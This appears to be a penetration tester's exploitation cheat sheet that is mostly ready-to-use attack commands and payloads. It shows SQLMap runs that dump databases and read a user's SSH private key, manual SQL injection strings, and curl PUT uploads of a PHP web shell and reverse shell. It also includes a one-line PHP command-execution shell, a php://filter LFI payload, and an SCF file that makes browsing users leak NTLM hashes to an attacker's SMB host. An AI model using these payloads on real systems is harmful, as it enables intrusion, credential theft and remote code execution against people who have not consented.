Tools-Exploitation

 

Exploitation

 

SQL-Injection

SQL-Map

##Save a request inside Burp with the „Save to File” function.
##Lets assume a request where parameter “id” might be injectable. Save request to a file called id.req.
##Then use SQLMap with -p and the name of the parameter to test.
> sqlmap -r id.req -p id

##Another way of telling SQLMap which parameter to test for injecting is by replacing the values of those parameter inside the request file with a wildecard (*). All parameters with a wildcards for a value will be tests for injection. Parameter -p will not be needed in these cases to run SQLMap.
## –dump will dump the content of the databases.
> sqlmap -r file.req –dump
## It is also possible to read local files off the target system.
> sqlmap -r file.req –file-read /home/offensiveuser/.ssh/id_rsa

 

Manuell injection testing

##Use ‘ to see if a webrequest gives an abnormal response
##Use — – to comment out any concatenating SQL statement that might break the query
##Use URL-encoding inside webbrowser
Admin’–+-
##Use URL-encoding for everything else inside Brup
Admin‘–%20-

 

Miscellaneous:

RCE via PHP:
##Check if HTTP-PUT Method is allowed or if there is a way to upload any php files
##Execute commands via http://10.10.10.10/upload/shell.php?offensive=whoami
> curl -v -X OPTIONS http://10.10.10.10/upload
> curl -v -X PUT -T rev_shell.php http://10.10.10.10/upload/

> curl -v -X PUT -d ‘‘my data as a string” http://10.10.10.10/upload/shell.php
> curl -v -X PUT http://10.10.10.10/upload/shell.php -d @/path/to/file

##Or save the following code as .php file and upload via application
> <?php system($_REQUEST['offensive']);?>

 

PHP-Wrapper for LFI:
##Passing as argument (most likely need to point at a .php file)
> (url) ?var1=1&var2=php://filter/convert.base64-encode/resource=/path/to/file.php

 

Steal NTLM hash with writeable SMB share:
##Put SCF-File inside Windows-Share. SCF-File triggers SMB authentication to responder as soon as an user browses the shares’ direcotry (LINK).
> vim @offensiveIT.scf

[Shell]
Command=2
IconFile=\\10.10.10.10\share\offensiveIT.ico
[Taskbar]
Command=explorer